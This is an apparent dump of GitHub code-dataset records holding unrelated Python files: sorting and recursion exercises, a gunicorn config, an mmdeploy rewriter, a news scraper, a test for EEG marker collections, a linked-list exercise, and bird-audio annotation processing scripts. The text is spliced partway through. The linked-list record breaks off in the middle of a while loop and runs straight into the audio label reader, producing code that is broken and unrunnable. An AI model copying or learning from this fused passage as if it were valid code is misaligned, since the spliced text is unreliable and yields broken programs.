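print([count_leq(b, i) for i in range(1, 6)])  # [4, 5, 5, 6, 6]
```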
O(n^2)\nlst=[]\nfor _ in range(int(input())):\n    lst.append(int(input()))\n\ndef bubblesort(lst):\n    while 1:\n        changed=0\n        for i in range(len(lst)-1):\n            if lst[i]>lst[i+1]:\n                lst[i],lst[i+1]=lst[i+1],lst[i]\n                changed=1\n        if not changed:\n            return lst\nprint(*bubblesort(lst),end='\\n')\n","repo_name":"nang-e/Baekjoon","sub_path":"12. 정렬/baekjoon_2750.py","file_name":"baekjoon_2750.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14129046090","text":"\"\"\"\nRecursion: When a function calls itself.\n\"\"\"\n\n# Factorial of a number using iterative method\n\n\ndef fact_iterative(n):\n    fact = 1\n    for i in range(1, n+1, 1):\n        fact = fact*i\n        # i = i+1\n    print(fact)\n\n\nnum = int(input(\"Enter a number for iterative factorial: \"))\nfact_iterative(num)\n\n\ndef fact_recursive(n):\n    if n == 0:\n        return 1\n    elif n == 1:\n        return 1\n    else:\n        return n*fact_recursive(n-1)\n\n\nnum = int(input(\"Enter a number for Recursion factorial: \"))\nprint(fact_recursive(num))\n","repo_name":"puja809/Python","sub_path":"Recursion.py","file_name":"Recursion.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23073414455","text":"import json\nimport multiprocessing\nimport os\n\nconfig_file = os.getenv(\"GUNICORN_CONF\", \"DEFAULT\")\nworkers_per_core_str = os.getenv(\"WORKERS_PER_CORE\", \"1\")\nweb_concurrency_str = os.getenv(\"WEB_CONCURRENCY\", \"1\")\nhost = os.getenv(\"HOST\", \"0.0.0.0\")\nport = os.getenv(\"PORT\", \"8080\")\nbind_env = os.getenv(\"BIND\", None)\nuse_loglevel = os.getenv(\"LOG_LEVEL\", \"info\")\ntimeout = os.getenv(\"TIMEOUT\", 30)\nworker_class = os.getenv(\"WORKER_CLASS\", \"uvicorn.workers.UvicornWorker\")\nkeepalive = os.getenv(\"KEEPALIVE\", 2)\nmax_requests = os.getenv(\"MAX_REQUESTS\", 1000)\n\nif bind_env:\n    use_bind = bind_env\nelse:\n    use_bind = f\"{host}:{port}\"\n\ncores = multiprocessing.cpu_count()\nworkers_per_core = float(workers_per_core_str)\ndefault_web_concurrency = workers_per_core * cores\nif web_concurrency_str:\n    web_concurrency = int(web_concurrency_str)\n    assert web_concurrency > 0\nelse:\n    web_concurrency = max(int(default_web_concurrency), 1)\n\n# Gunicorn config variables\nloglevel = use_loglevel\nworkers = web_concurrency\nbind = use_bind\nkeepalive = 120\nerrorlog = \"-\"\n\n# For debugging and testing\nlog_data = {\n    \"config_file\": config_file,\n    \"loglevel\": loglevel,\n    \"workers\": workers,\n    \"bind\": bind,\n    # Additional, non-gunicorn variables\n    \"workers_per_core\": workers_per_core,\n    \"host\": host,\n    \"port\": port,\n    \"timeout\": timeout,\n    \"worker_class\": worker_class,\n    \"keepalive\": keepalive\n}\nprint(json.dumps(log_data))","repo_name":"Salfiii/fastapi-template","sub_path":"app/gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13920385481","text":"import torch\n\nfrom mmdeploy.core import FUNCTION_REWRITER\nfrom mmdeploy.utils import is_dynamic_shape\n\n\n@FUNCTION_REWRITER.register_rewriter('mmdet.models.detectors.maskformer.'\n                                     'MaskFormer.forward')\ndef maskformer__forward(self,\n                        batch_inputs,\n                        data_samples,\n                        mode='tensor',\n                        **kwargs):\n    \"\"\"Rewrite `forward` for default backend. 
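The worker-count logic in the gunicorn config above resolves to `WEB_CONCURRENCY` when that variable is set, otherwise `cores * WORKERS_PER_CORE` floored at 1; note that the record defaults `WEB_CONCURRENCY` to "1", so its fallback branch never actually runs. Just that calculation, isolated (the empty-string default is my change to make the fallback reachable):

```python
import multiprocessing
import os

workers_per_core = float(os.getenv("WORKERS_PER_CORE", "1"))
web_concurrency_str = os.getenv("WEB_CONCURRENCY", "")  # unset -> fallback

cores = multiprocessing.cpu_count()
if web_concurrency_str:
    workers = int(web_concurrency_str)  # explicit override wins
    assert workers > 0
else:
    # e.g. WORKERS_PER_CORE=0.5 on an 8-core box -> 4 workers, never below 1
    workers = max(int(workers_per_core * cores), 1)

print(f"{cores=} {workers=}")
```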
Support configured dynamic/static\n shape for model input and return detection result as Tensor instead of\n numpy array.\n\n Args:\n batch_inputs (Tensor): Inputs with shape (N, C, H, W).\n batch_data_samples (List[:obj:`DetDataSample`]): The Data\n Samples. It usually includes information such as\n `gt_instance`, `gt_panoptic_seg` and `gt_sem_seg`.\n rescale (bool): Whether to rescale the results.\n Defaults to True.\n\n Returns:\n tuple[Tensor, Tensor, Tensor, Tensor]:\n (bboxes, labels, masks, semseg), `bboxes` of shape [N, num_det, 5],\n `labels` of shape [N, num_det], `masks` of shape [N, roi_H, roi_W],\n `semseg` of shape [N, num_sem_class, sem_H, sem_W].\n \"\"\"\n ctx = FUNCTION_REWRITER.get_context()\n deploy_cfg = ctx.cfg\n\n # get origin input shape as tensor to support onnx dynamic shape\n is_dynamic_flag = is_dynamic_shape(deploy_cfg)\n img_shape = torch._shape_as_tensor(batch_inputs)[2:]\n if not is_dynamic_flag:\n img_shape = [int(val) for val in img_shape]\n # set the metainfo\n # note that we can not use `set_metainfo`, deepcopy would crash the\n # onnx trace.\n for data_sample in data_samples:\n data_sample.set_field(\n name='img_shape', value=img_shape, field_type='metainfo')\n data_sample.set_field(\n name='batch_input_shape', value=img_shape, field_type='metainfo')\n\n feats = self.extract_feat(batch_inputs)\n mask_cls_results, mask_pred_results = self.panoptic_head.predict(\n feats, data_samples)\n # do not export panoptic_fusion_head\n return mask_cls_results, mask_pred_results\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/codebase/mmdet/models/detectors/maskformer.py","file_name":"maskformer.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"36331563712","text":"from newspaper import newspaper # from newspaper import Article, Config # https://newspaper.readthedocs.io/en/latest/ \nfrom datetime import datetime\nfrom urllib.parse import urljoin, urlparse, parse_qs\nimport re\nfrom tqdm import tqdm\nimport logging\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.WARNING)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n# 콘솔로 출력\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\n\n\"\"\"\n\nkeep_article_html, default False, “set to True if you want to preserve html of body text”\nhttp_success_only, default True, “set to False to capture non 2XX responses as well”\nMIN_WORD_COUNT, default 300, “num of word tokens in article text”\nMIN_SENT_COUNT, default 7, “num of sentence tokens”\nMAX_TITLE, default 200, “num of chars in article title”\nMAX_TEXT, default 100000, “num of chars in article text”\nMAX_KEYWORDS, default 35, “num of keywords in article”\nMAX_AUTHORS, default 10, “num of author names in article”\nMAX_SUMMARY, default 5000, “num of chars of the summary”\nMAX_SUMMARY_SENT, default 5, “num of sentences in summary”\nMAX_FILE_MEMO, default 20000, “python setup.py sdist bdist_wininst upload”\nmemoize_articles, default True, “cache and save articles run after run”\nfetch_images, default True, “set this to false if you don’t care about getting images”\nfollow_meta_refresh, default False, “follows a redirect url in a meta refresh html tag”\nimage_dimension_ration, default 16/9.0, “max ratio for height/width, we ignore if greater”\nlanguage, default ‘en’, “run newspaper.languages() to see available 
options.”\nbrowser_user_agent, default ‘newspaper/%s’ % __version__\nrequest_timeout, default 7\nnumber_threads, default 10, “number of threads when mthreading”\nverbose, default False, “turn this on when debugging”\n\"\"\"\n\n\n\ndef scrap(urls, idx=None, sensitive_domain_cats=None): \n docs_info = []\n docs_idx = []\n no_scraped_urls_by_types = {'sensitive_domain':[], 'parse_error':[], 'empty_contents':[]}\n\n \n if idx is not None:\n assert len(idx) == len(urls), \"The length of urls and idx should be same.\"\n doc_info = {}\n #urls = set(urls) # 이거 실행하면 순서가 바뀌어버림..\n\n sensitive_domains = get_sensitive_domains(sensitive_domain_cats)\n\n # Newspaper3k configuration \n config = newspaper.Config()\n config.browser_user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n # config.MIN_WORD_COUNT = 100\n # config.memoize_articles = False\n # config.fetch_images = False\n # number_threads = 16 # 10\n # verbose = True\n\n for i, url in tqdm(enumerate(urls), desc='scraper'):\n url = url_prefix_adder(url)\n\n # check whether sensitive_domain is or not\n if is_sensitive_domain(url, sensitive_domains):\n no_scraped_urls_by_types['sensitive_domain'].append(url)\n logger.info(f\"sensitive_domain: {url}\")\n continue\n\n # Scraping\n article = newspaper.Article(url, config=config) # , language='ko'\n\n try:\n logger.info(\"loading %s\", url)\n article.download() # request\n article.parse() # parsing\n \n doc_info = {\n 'title': article.title,\n # 'authors': article.authors,\n 'publish_date': article.publish_date,\n 'contents': article.text,\n 'url': url,\n 'crawl_at': datetime.now(),\n 'is_news': article.is_valid_url(),\n # 'top_image': article.top_image,\n # 'movies': article.movies\n }\n\n except:\n logger.warning(f\"parse_error: {url}\")\n no_scraped_urls_by_types['parse_error'].append(url)\n continue\n \n if doc_info['title'] == '' or doc_info['contents'] == '':\n logger.warning(f\"title/contents is empty: {url}\")\n no_scraped_urls_by_types['empty_contents'].append(url)\n continue\n else:\n #print(doc_info['title'], type(doc_info['title']))\n docs_info.append(doc_info) \n if idx is not None:\n docs_idx.append(idx[i])\n\n logger.info(f\"Complete scrape {len(docs_info)} among {len(urls)}\")\n \n return docs_info, docs_idx, no_scraped_urls_by_types\n\n\ndef url_extractor(text):\n regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n url = re.findall(regex,text) \n return [x[0] for x in url] \n\ndef url_prefix_adder(url):\n \"\"\"\n url 앞에 http:// 또는 https://가 붙어 있지 않은 url의 경우, 앞에 이를 붙여서 리턴\n \"\"\"\n http_reg = re.compile(\"https?://\\S*\")\n \n if http_reg.match(url):\n return url\n else:\n url_fixed = \"https://\" + url #http로..?\n # requests.get() # 잘되는지 체크가 필요하지만... 
\n return url_fixed\n\n\n\n\ndef get_sensitive_domains(sensitive_domain_cats=None):\n\n sensitive_domains_dict = {\n \"cloud\": ['dropbox.com','drive.google.com', 'onedrive.live.com'],\n \"sns/community\": ['facebook.com','instagram.com', 'twitter.com', 'dcinside.com','fmkorea.com','humoruniv.com',],\n 'shopping': ['gmarket.co.kr','auction.co.kr','11st.co.kr','coupang.com','tmon.co.kr','interpark.com','ssg.com','wemakeprice.com','danawa.com','yes24.com','amazon.com','ebay.com','amazon.co.jp','amazon.co.uk','ppomppu.co.kr',],\n \"ott\": ['youtube.com','netflix.com','melon.com','afreecatv.com','pandora.tv','wavve.com','twitch.tv','gomtv.com','toptoon.com',],\n \"online_meeting\": ['zoom.us','meet.google.com',],\n }\n \n if sensitive_domains_dict is None:\n return None\n else:\n sensitive_domains = [domain for cat in sensitive_domain_cats for domain in sensitive_domains_dict[cat]]\n return sensitive_domains\n\ndef is_sensitive_domain(url, sensitive_domains):\n for domain in sensitive_domains:\n if domain in url:\n return True\n return False\n \n#print(check_sensitive_webpage('gmarket.co.kr', ['Shopping']))","repo_name":"uoneway/Prepo","sub_path":"prepo/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73598924327","text":"from mne.utils import _TempDir\n\n# our imports\nfrom nice.markers import PowerSpectralDensity\nfrom nice.markers import ContingentNegativeVariation\nfrom nice.markers import PermutationEntropy\nfrom nice.markers import PowerSpectralDensityEstimator\n\nfrom nice_sandbox.markers.connectivity import WeightedPhaseLagIndex\n\nfrom nice import Markers, read_markers\n\nfrom nice.tests.test_collection import _get_data\n\n\ndef test_collecting_feature():\n \"\"\"Test computation of spectral markers\"\"\"\n epochs = _get_data()[:2]\n psds_params = dict(n_fft=4096, n_overlap=100, n_jobs='auto',\n nperseg=128)\n estimator = PowerSpectralDensityEstimator(\n tmin=None, tmax=None, fmin=1., fmax=45., psd_method='welch',\n psd_params=psds_params, comment='default'\n )\n\n wpli = WeightedPhaseLagIndex()\n markers_list = [\n PowerSpectralDensity(estimator=estimator, fmin=1, fmax=4),\n ContingentNegativeVariation(),\n wpli\n ]\n\n markers = Markers(markers_list)\n # check states and names\n for name, marker in markers.items():\n assert not any(k.endswith('_') for k in vars(marker))\n assert name == marker._get_title()\n\n # check order\n assert list(markers.values()) == markers_list\n\n # check fit\n markers.fit(epochs)\n for t_marker in markers_list:\n assert any(k.endswith('_') for k in vars(t_marker))\n\n tmp = _TempDir()\n tmp_fname = tmp + '/test-smarkers.hdf5'\n markers.save(tmp_fname)\n markers2 = read_markers(tmp_fname)\n for ((k1, v1), (k2, v2)) in zip(markers.items(), markers2.items()):\n assert k1 == k2\n assert (\n {k: v for k, v in vars(v1).items() if not k.endswith('_') and\n not k == 'estimator'} ==\n {k: v for k, v in vars(v2).items() if not k.endswith('_') and\n not k == 'estimator'})\n pe = PermutationEntropy().fit(epochs)\n markers._add_marker(pe)\n\n tmp = _TempDir()\n tmp_fname = tmp + '/test-markers.hdf5'\n markers.save(tmp_fname)\n markers3 = read_markers(tmp_fname)\n assert pe._get_title() in markers3\n\n assert wpli._get_title() in 
markers3\n","repo_name":"fraimondo/nice-sandbox","sub_path":"nice_sandbox/markers/tests/test_collection.py","file_name":"test_collection.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34574587525","text":"# Given the head of a linked list, remove the nth node from the end of the list and return its head.\n\n \n\n# Example 1:\n\n\n# Input: head = [1,2,3,4,5], n = 2\n# Output: [1,2,3,5]\n# Example 2:\n\n# Input: head = [1], n = 1\n# Output: []\n# Example 3:\n\n# Input: head = [1,2], n = 1\n# Output: [1]\n \n\nfrom itertools import count\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next \n \ndef countList(list):\n count = 1\n while list.next:\n count+=1\n list = list.next\n return count\n\n\ndef removeNthFromEnd(head, n):\n if n == 0:\n return head \n else:\n to_return = head\n len = countList(head)\n if len == n:\n return head.next\n pos = len - n\n pointer = 1\n\n while pointer 1 and df.iat[1,0] == '\\\\':\n has_freq_range = True\n print('freq range info included in label file')\n else:\n has_freq_range = False\n\n if has_freq_range:\n \n if ignore_freq_range:\n # Remove freq range rows starting with \\ (all odd rows) if ignore_freq_range\n df = df.drop(df[df.iloc[:, 0] == '\\\\'].index).reset_index(drop=True)\n # Add header\n df.columns = ['start_time', 'end_time', 'label']\n else:\n # Include freq range as new cols start_freq and end_freq\n\n # Get start & end freq\n df_freq = df[df.iloc[:, 0] == '\\\\']\n start_freq_list = df_freq.iloc[:, 1].tolist()\n end_freq_list = df_freq.iloc[:, 2].tolist()\n #print(df_freq)\n\n # Remove freq range rows starting with \\ (all odd rows)\n df = df.drop(df[df.iloc[:, 0] == '\\\\'].index).reset_index(drop=True)\n # Add header\n df.columns = ['start_time', 'end_time', 'label']\n\n # Add cols\n df['start_freq'] = start_freq_list\n df['end_freq'] = end_freq_list\n\n # Reorder cols\n df = df[['start_time', 'end_time', 'start_freq', 'end_freq', 'label']]\n #print(df)\n\n else:\n # Add header\n df.columns = ['start_time', 'end_time', 'label']\n\n #print(df)\n return df\n\ndef process_audacity_label_data(df, check_label_data=True):\n\n '''\n example of label: sp=Crex crex; ct=s; ql=2; id=1; bg=0; cm=Hallo\n\n Artname (sp): Crex crex\n Lauttyp (ct): vorerst 3: s=Gesang, c=Ruf, i=instrumental (Trommeln o.ä.)\n Qualität (ql): 1 bis 5; 1 – sehr gut; 2 – gut; 3 – brauchbar; 4 – sehr schlecht; 5 – gerade noch zu hören\n Sicherheit d. 
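The length-counting solution in the record above is cut off mid-loop; for reference, a self-contained two-pointer variant of the same problem that removes the nth node from the end in a single pass (my sketch, not a reconstruction of the record's missing lines):

```python
class ListNode:
    def __init__(self, val=0, nxt=None):
        self.val = val
        self.next = nxt

def remove_nth_from_end(head, n):
    dummy = ListNode(0, head)
    fast = slow = dummy
    for _ in range(n):          # advance fast n nodes ahead
        fast = fast.next
    while fast.next:            # move both until fast reaches the tail
        fast = fast.next
        slow = slow.next
    slow.next = slow.next.next  # slow sits just before the node to drop
    return dummy.next

head = ListNode(1, ListNode(2, ListNode(3, ListNode(4, ListNode(5)))))
head = remove_nth_from_end(head, 2)
out = []
while head:
    out.append(head.val)
    head = head.next
print(out)  # [1, 2, 3, 5]
```

The dummy node handles the edge case where the head itself is removed (n equal to the list length) without a special branch.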
Identifikation (id): 1 – zu 100% sicher, 2 – sehr sicher, 3 – unsicher\n Hintergrund (bg): 0 – kein Hintergrund; 1 – im Hintergrund andere Art, aber deutlich leiser; 2 - im Hintergrund andere Art deutlich\n Freies Feld (cm): alle anderen Kommentare\n '''\n\n assignment_operator = '='\n separator = ';'\n\n key_tags = ['sp', 'ct', 'ql', 'id', 'bg', 'cm']\n key_names = ['species', 'call_type', 'quality', 'id_level', 'background_level', 'comment']\n\n # ToDo: Sanity checks\n # assignment_operator, separator correct\n # what key_tags are used\n # are number of key_tags always the same\n\n n_rows = len(df.index)\n\n label_df_dict = {}\n for key in key_tags:\n label_df_dict[key] = [None] * n_rows\n\n for ix, row in df.iterrows():\n label_str = row['label']\n # Remove leading and trailing whitespaces\n label_str = label_str.strip()\n # Remove leading and trailing separators\n label_str = label_str.strip(separator)\n\n #print(ix, label_str)\n\n # Split into labels\n labels = label_str.split(separator)\n #print(labels)\n\n \n for label in labels:\n # Remove leading and trailing whitespaces\n label = label.strip()\n #print(label)\n key_value_pair = label.split(assignment_operator)\n #print(key_value_pair)\n key = key_value_pair[0]\n value = key_value_pair[1]\n #print(key, value)\n \n if key not in key_tags:\n print('Error: Undefined key', key, ix, label)\n else:\n # Dequote comment string: \"comment\" --> comment\n if key == 'cm' and value[0] == value[-1] and value.startswith((\"'\", '\"')):\n value = value[1:-1]\n\n label_df_dict[key][ix] = value\n\n #print(label_df_dict)\n\n # Check if there are label without any/some data\n if check_label_data:\n for key in key_tags:\n if label_df_dict[key].count(None) == len(label_df_dict[key]):\n print(key, 'has no data at all')\n else:\n if label_df_dict[key].count(None) > 0:\n print(key, 'has no data sometimes')\n\n label_df = pd.DataFrame.from_dict(label_df_dict)\n # Rename cols (e.g. 
sp --> species)\n label_df.columns = key_names\n #print(label_df)\n\n # Remove label col from original df\n df = df.drop(columns=['label'])\n\n # Merge original df with extracted label df\n assert len(df.index) == len(label_df.index)\n df_concatenated = pd.concat([df, label_df], axis=\"columns\")\n #print(df_concatenated)\n\n return df_concatenated\n\n\n#path = lars_dir + 'Unteres_Odertal_2021_06_10/Devise02_2021-06-10T22-38-32_Pos01.txt'\n#path = metadata_dir + '_BackupML/Devise07_2022-05-09T20-40-27_Annotation.txt'\npath = lars_dir + 'Criewen_2022_05_15/Criewen02/CRIEWEN02_20220515_202400.txt'\n# df = read_audacity_label_file(path)\n# df = process_audacity_label_data(df)\n# print(df)\n\ndef read_raven_label_file(path):\n\n if not os.path.isfile(path): \n print('Error: File not found', path)\n\n # Read audacity label track txt file\n df = pd.read_csv(path, sep='\\t')\n #print(df)\n return df\n\npath = root_dir + 'Scolopax_rusticola_Recordings/Monitoring/Peenemuende_140525_327_4ch.Table.1.selections.txt'\n#read_raven_label_file(path)\n\ndef write_part_of_audio_file(path, start_time=0.0, end_time=None, channel_ix=None, dst_dir=None, format=None, add_start_time_even_if_zero=False):\n\n # ToDo Maybe: resample, remove dc-offset (hp filter), normalize, fade in/out\n\n # Get filename and extension\n filename = os.path.basename(path)\n [filename_without_ext, ext] = os.path.splitext(filename)\n \n # Get destination directory\n if not dst_dir:\n # Use same dir as src file path\n dst_dir = os.path.dirname(path) + '/'\n if dst_dir[-1] != '/':\n dst_dir += '/'\n if not os.path.exists(dst_dir): \n os.makedirs(dst_dir)\n\n # Get dst path\n filename_new = filename_without_ext + create_postfix_str(start_time, add_start_time_even_if_zero=add_start_time_even_if_zero)\n if channel_ix is not None: \n filename_new += '_c' + str(channel_ix)\n if format: \n ext = '.' + format\n path_new = dst_dir + filename_new + ext\n\n if not os.path.isfile(path_new):\n\n if os.path.isfile(path):\n \n # Get audio file infos\n with sf.SoundFile(path) as f:\n samplerate = f.samplerate\n n_channels = f.channels\n subtype = f.subtype # bit depth info, e.g. 
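The `sp=...; ct=...; ql=...` label grammar documented above can be exercised in a few lines; a minimal parser for a single Audacity label string, using the same `=`/`;` separators and comment-dequoting rule as `process_audacity_label_data`:

```python
def parse_label(label_str, assignment="=", separator=";"):
    pairs = {}
    for part in label_str.strip().strip(separator).split(separator):
        key, _, value = part.strip().partition(assignment)
        # Dequote free-text comments: "Hallo" -> Hallo
        if key == "cm" and value[:1] in ("'", '"') and value[:1] == value[-1:]:
            value = value[1:-1]
        pairs[key] = value
    return pairs

print(parse_label('sp=Crex crex; ct=s; ql=2; id=1; bg=0; cm="Hallo"'))
# {'sp': 'Crex crex', 'ct': 's', 'ql': '2', 'id': '1', 'bg': '0', 'cm': 'Hallo'}
```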
'PCM_16', 'PCM_24'\n\n start_ix = 0\n end_ix = None\n if start_time:\n start_ix = int(start_time*samplerate)\n if end_time:\n end_ix = int(end_time*samplerate)\n data, samplerate = sf.read(path, start=start_ix, stop=end_ix, always_2d=True)\n\n if channel_ix is not None:\n sf.write(path_new, data[:,channel_ix], samplerate, subtype=subtype)\n else:\n sf.write(path_new, data, samplerate, subtype=subtype)\n \n else:\n print('Error file not found', path)\n\n else:\n print('Warning dst path already existing', path_new)\n\n\ndef get_open_intervals(df, global_start_time=0.0, global_end_time=None):\n \n # Input: df with intervals (start_time, end_time)\n # Output: df with open intervals not intersecting with input intervals\n \n df_new_dict = {}\n df_new_dict['start_time'] = []\n df_new_dict['end_time'] = []\n\n # Get list of dicts (pairs of time, start/stop event type)\n events = []\n for ix, row in df.iterrows():\n event = {'time': row['start_time'], 'type': 'start_time'}\n events.append(event)\n event = {'time': row['end_time'], 'type': 'end_time'}\n events.append(event)\n\n # Sort by time\n events = sorted(events, key=lambda d: d['time']) \n #print(events)\n\n start_time = 0.0\n counter = 0\n for event in events:\n\n if counter == 0 and event['time'] > global_start_time:\n df_new_dict['start_time'].append(start_time)\n df_new_dict['end_time'].append(event['time'])\n\n if event['type'] == 'start_time': counter +=1\n else: counter -=1\n\n start_time = event['time']\n \n # Get last interval if last end_time < global_end_time\n if global_end_time and global_end_time > start_time:\n df_new_dict['start_time'].append(start_time)\n df_new_dict['end_time'].append(global_end_time)\n\n # Convert to df\n df_new = pd.DataFrame.from_dict(df_new_dict)\n #print(df_new) \n\n return df_new\n\ndef create_noise_annotations(df, dilation_duration=1.0, min_duration=5.0):\n \n # Create dataframe with anti/none annotations (all intervals without annotation for each filename)\n\n # Cols belonging to annoations that get meaningless\n cols_set_to_none = ['start_frequency', 'end_frequency', 'individual_id', 'group_id', 'vocalization_type', 'quality_tag', 'id_level', 'background_level', 'remarks', 'xeno_canto_background', 'species_latin_name']\n\n # Create df_dilation (add time interval to start/end time)\n df_dilation = df.copy()\n df_dilation['start_time'] = df_dilation['start_time'] - dilation_duration\n df_dilation['end_time'] = df_dilation['end_time'] + dilation_duration\n\n # Check/correkt if start_time < 0.0 (ToDo: end_time > duration)\n df_dilation.loc[df_dilation['start_time'] < 0.0, 'start_time'] = 0.0\n\n # Sort by filename and start_time\n df_dilation = df_dilation.sort_values(['filename', 'start_time']).reset_index(drop=True)\n #print(df_dilation[10:20])\n\n # Create new df with same cols\n cols = df_dilation.columns\n #print(list(cols))\n df_new = pd.DataFrame(columns=cols)\n\n filenames = list(df['filename'].unique())\n n_files = len(filenames)\n\n counter = 0\n for filename in filenames:\n\n #if counter > 4: break\n\n df_filename = df_dilation[df_dilation['filename']==filename].reset_index(drop=True)\n #print(df_filename)\n\n # Get duration\n path = df_filename.record_filepath.values[0]\n with sf.SoundFile(path) as f:\n duration = f.frames/f.samplerate\n\n\n df_filename_noise = get_open_intervals(df_filename, global_start_time=0.0, global_end_time=duration)\n\n # Filter intervals >= min_duration\n df_filename_noise = df_filename_noise[(df_filename_noise['end_time'] - df_filename_noise['start_time'] >= 
min_duration)].reset_index(drop=True)\n #print(df_filename_noise)\n\n # Add org recording metadata\n for ix, row in df_filename_noise.iterrows():\n # Append first row of df_filename\n df_new = df_new.append(df_filename.iloc[0]).reset_index(drop=True)\n # Change start/end_time\n df_new.at[df_new.index[-1], 'start_time'] = row['start_time']\n df_new.at[df_new.index[-1], 'end_time'] = row['end_time']\n\n counter += 1\n\n # Set cols with annoation individual values to None\n for col in cols_set_to_none:\n if col in cols:\n df_new[col] = None\n\n #print(df_new)\n\n return df_new\n\ndef divide_intervals_into_beginning_and_end(df, segment_duration=10.0, segment_duration_max=30.0, segment_duration_min=None):\n\n # Divide/Reduce intervals in beginning and end part with duration=segment_duration \n # Divide/Reduce interval only if original duration >= segment_duration_max\n # Discard middle part\n # Remove intervals with duration < segment_duration_min\n\n assert segment_duration_max > 2*segment_duration\n\n rows_to_remove_ixs = []\n\n for ix, row in df.iterrows():\n start_time = row['start_time']\n end_time = row['end_time']\n duration = end_time - start_time\n assert duration > 0.0\n \n if duration >= segment_duration_max:\n # Adjust original interval\n df.at[ix, 'end_time'] = start_time + segment_duration\n # Append end segment to df\n row_new = row\n row_new['start_time'] = end_time - segment_duration\n df = df.append(row_new, ignore_index=True)\n #print(ix, start_time, end_time)\n\n if segment_duration_min and duration < segment_duration_min:\n rows_to_remove_ixs.append(ix)\n #print(ix, start_time, end_time)\n \n # Remove intervals with duration < segment_duration_min\n if len(rows_to_remove_ixs):\n df = df.drop(df.index[rows_to_remove_ixs]).reset_index(drop=True)\n \n # Sort\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n return df\n\ndef process_Crex_crex_Unteres_Odertal_2017():\n\n\n write_audio_files = False # True False\n write_metadata = True\n\n audio_root_src_dir = root_dir + 'Crex_crex_annotated/Crex_crex_Unteres_Odertal_2017_annotated/'\n audio_root_dst_dir = root_dir + 'Annotationen/_Segments/'\n\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Crex_crex_Unteres_Odertal_2017_v02'\n\n collection_name = 'devise'\n \n # Read excel file\n path = metadata_dir + 'Crex_crex_Unteres_Odertal_2017.xlsx'\n\n if not os.path.isfile(path): \n print('Error: File not found', path)\n\n df = pd.read_excel(path, engine='openpyxl')\n #print(df)\n print('n_rows', len(df))\n\n filenames = df['filename'].unique()\n n_filenames = len(filenames)\n #print(filenames)\n print('n_filenames', n_filenames)\n\n # df_new stuff\n df_new_dict = {}\n keys = ['filename', 'species_latin_name', 'noise_name', 'record_date', 'record_filepath']\n for key in keys:\n df_new_dict[key] = []\n\n\n for ix, row in df.iterrows():\n\n #if ix > 10: break\n #print(ix, row['filename'])\n\n filename = row['filename']\n start_time = row['start_time']\n end_time = row['end_time']\n channel_ix = row['channel_ix']\n\n if row['class'] == 'Crex crex':\n dst_sub_dir = 'Crex_crex'\n df_new_dict['species_latin_name'].append(row['class'])\n df_new_dict['noise_name'].append(None)\n if row['class'] == 'BG':\n dst_sub_dir = 'Crex_crex_BG'\n df_new_dict['species_latin_name'].append(None)\n df_new_dict['noise_name'].append('Crex crex absent')\n\n path = audio_root_src_dir + row['sub_dir'] + '/' + filename + '.wav'\n\n if not os.path.isfile(path):\n print(\"Error: File not found\", path)\n 
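            # Note on the rows above/below: species_latin_name/noise_name were
            # already appended for this row before this file check, but the
            # matching filename, record_date and record_filepath entries are
            # skipped by the continue. If a file is ever missing, the
            # df_new_dict lists end up with unequal lengths and
            # pd.DataFrame.from_dict fails later; moving the early appends
            # after this check would make the skip safe.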
continue\n \n \n dst_dir = audio_root_dst_dir + dst_sub_dir + '/'\n\n if write_audio_files: \n write_part_of_audio_file(path, start_time, end_time, channel_ix=channel_ix, dst_dir=dst_dir)\n\n\n filename_new = filename + create_postfix_str(start_time) + '_c' + str(channel_ix)\n\n df_new_dict['filename'].append(filename_new)\n \n date_str = filename.split('_')[3]\n date = date_str[:4] + '-' + date_str[4:6] + '-' + date_str[6:8]\n df_new_dict['record_date'].append(date)\n\n filenamepath_new = dst_dir + filename_new + '.wav'\n df_new_dict['record_filepath'].append(filenamepath_new)\n\n\n print(filename, filename_new)\n\n\n df_new = pd.DataFrame.from_dict(df_new_dict)\n\n # Add infos\n df_new['id_level'] = 1\n df_new['vocalization_type'] = 'song'\n \n df_new['recordist_name'] = 'Frommolt, Karl-Heinz'\n df_new['annotator_name'] = 'Frommolt, Karl-Heinz'\n df_new['location_name'] = 'Unteres Odertal'\n df_new['collection_name'] = collection_name\n\n print(df_new)\n\n # Write metadata (excel, csv)\n if write_metadata:\n df_new.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n #df_new.to_csv(metadata_path_without_ext + '.csv', index=False)\n\n#process_Crex_crex_Unteres_Odertal_2017()\n\ndef process_hakan_schoenow():\n\n write_audio_parts = False # True False\n write_metadata = True\n 